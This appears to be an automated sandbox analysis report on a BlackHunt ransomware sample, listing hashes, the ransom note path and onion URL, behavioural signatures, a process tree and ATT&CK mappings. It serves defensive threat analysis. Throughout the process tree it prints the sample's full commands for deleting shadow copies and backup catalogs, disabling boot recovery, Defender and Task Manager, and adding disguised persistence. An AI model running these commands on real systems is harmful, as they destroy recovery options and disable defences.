Analysis
max time kernel: 133s
max time network: 128s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 19/01/2024, 01:08
Static task: static1
Behavioral task: behavioral1
  Sample: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
  Resource: win10v2004-20231215-en
General
Target: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Size: 707KB
MD5: 31b37b83804d77f81c043d287a022572
SHA1: 3211a7e65f36760f1dd465bbb2452db1edea4f2e
SHA256: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25
SHA512: 8832e70da76994483a124d9fdbab39d16279f4502f7878eee64c72452435da8428827a9a6097d40ac60269a942c8db25c31d450943c3cbd2c5dbd7dff60f6e21
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158Svnh:6uaTmkZJ+naie5OTamgEoKxLWc8h
Malware Config
Extracted
Path: C:\ProgramData\#BlackHunt_ReadMe.hta
URL: http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 1 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
  pid 848 fsutil.exe

Modifies Windows Defender Real-time Protection settings
  Key created: \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection (reg.exe)
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" (reg.exe)

UAC bypass
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe)
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  pid 2516 bcdedit.exe
  pid 544 bcdedit.exe
Renames multiple (2922) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

[signature name not preserved]
  pid 2920 wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTPs)

Adds Run key to start application (2 TTPs, 1 IoCs)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" (reg.exe)

Checks whether UAC is enabled
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe)
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe: \??\J:, \??\V:, \??\W:, \??\R:, \??\Q:, \??\N:, \??\M:, \??\E:, \??\P:, \??\U:, \??\B:, \??\S:, \??\G:, \??\H:, \??\Z:, \??\X:, \??\I:, \??\Y:, \??\O:, \??\A:, \??\L:, \??\K:, \??\T:
  File opened (read-only) by vssadmin.exe: \??\F: (two events)
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 2: ip-api.com
Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid 1356 schtasks.exe

Interacts with shadow copies (2 TTPs, 5 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid 2836 vssadmin.exe
  pid 2844 vssadmin.exe
  pid 568 vssadmin.exe
  pid 2488 vssadmin.exe
  pid 2492 vssadmin.exe

Modifies registry class (8 IoCs)
  Key created: \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon (reg.exe)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
  Key created: \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon (reg.exe)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" (reg.exe)
  Key created: \REGISTRY\MACHINE\Software\Classes\.Hunt2 (reg.exe)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ (reg.exe)
  Key created: \REGISTRY\MACHINE\Software\Classes\Hunt2 (reg.exe)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ (reg.exe)

Suspicious use of AdjustPrivilegeToken (13 IoCs)
  pid 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe: SeDebugPrivilege, SeRestorePrivilege, SeBackupPrivilege, SeTakeOwnershipPrivilege, SeAuditPrivilege, SeSecurityPrivilege, SeIncBasePriorityPrivilege
  pid 560 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  pid 1808 wbengine.exe: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
Suspicious use of WriteProcessMemory (64 IoCs)
System policy modification (1 TTPs, 3 IoCs)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe)
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe)
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe)

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe (PID 2472)
  Command line: "C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe"
  - UAC bypass
  - Checks whether UAC is enabled
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification

    C:\Windows\System32\cmd.exe (PID 2424)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\reg.exe (PID 2820)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
          - Modifies registry class

    C:\Windows\System32\cmd.exe (PID 2260)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        C:\Windows\system32\reg.exe (PID 1828)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
          - Modifies registry class

    C:\Windows\System32\cmd.exe (PID 2688)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        C:\Windows\system32\reg.exe (PID 2940)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
          - Modifies registry class

    C:\Windows\System32\cmd.exe (PID 2652)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        C:\Windows\system32\reg.exe (PID 2836)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
          - Modifies registry class

    C:\Windows\System32\cmd.exe (PID 2760)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
        C:\Windows\system32\reg.exe (PID 1788)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
          - Adds Run key to start application

    C:\Windows\System32\cmd.exe (PID 2788)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        C:\Windows\system32\reg.exe (PID 2852)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

    C:\Windows\System32\cmd.exe (PID 2752)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        C:\Windows\system32\reg.exe (PID 584)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
          - Modifies Windows Defender Real-time Protection settings

    C:\Windows\System32\cmd.exe (PID 2672)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
        C:\Windows\system32\reg.exe (PID 1724)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

    C:\Windows\System32\cmd.exe (PID 2800)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
        C:\Windows\system32\reg.exe (PID 1528)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

    C:\Windows\System32\cmd.exe (PID 2832)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
        C:\Windows\system32\reg.exe (PID 1992)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

    C:\Windows\System32\cmd.exe (PID 2796)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
        C:\Windows\system32\reg.exe (PID 1688)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

    C:\Windows\System32\cmd.exe (PID 2584)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
        C:\Windows\system32\reg.exe (PID 1512)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

    C:\Windows\System32\cmd.exe (PID 2572)
      Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
        C:\Windows\system32\reg.exe (PID 1816)
          Command line: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1028
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2716
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2668
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:540
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:556
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2896
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:336
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe" /F2⤵PID:1644
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe" /F3⤵
- Creates scheduled task(s)
PID:1356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2080
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2072
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2168
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1320
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1264
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1636
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2724
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2456
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:836
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3036
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:956
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:560
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:916
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2276
Network
MITRE ATT&CK Enterprise v15

Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)

Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)

Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (3)
  - File Deletion (3)
- Modify Registry (4)
Downloads

- Filesize: 1KB
  MD5: aba26acbb31bcc8c0b2707ecd21b61e0
  SHA1: 58f58d7c3bbe815fe8aa65e9a40d8b8e6aa2842a
  SHA256: 755e8adf38c7b95043b27eb780299da07117010a6ac6bca8d0779f655aec9882
  SHA512: 4859d379b8cc8cdbc4b1ff61a75a81d7cf5ee4492e8fbf872b00db251fd9096d70aeed08c9ba0d309b1ac4560ed596c2933ec9a212a2cebbd12eb333a5b4da97

- Filesize: 12KB
  MD5: 51161509e1a943fb884a6abda25b0e29
  SHA1: 145a2893c3a6eca4fcd0006f2162c40a49c1d7af
  SHA256: 750074b4b7751c84fd17ab30d83e93b78646df71a6f9cf011c2416d1ffb14a16
  SHA512: 2fd4056965af593f018ed98de2b954ebb4f29ad5f932cee068ccc5d27d041800251be6511d3b50fac19d636f01ee03f7e2a668ee877d1082b612000ab0a48f90

- Filesize: 684B
  MD5: d9f3745455ac58f44c2826adf121646c
  SHA1: 931c5ba911fde19465f27e9b1a0a6f3f3d4c0868
  SHA256: 5d6206e63642d97dde5d7038b28731da945465d3cb11afb7c689d06fe2227b8f
  SHA512: 26f22f1f9344e987fbfaef3959134de70599175d63c3bcc421de6d8e96a0edffb55a8bae543c50dac1bd596d7f923acd67c84aa572b41f32fa07c8dd7bd2f4c9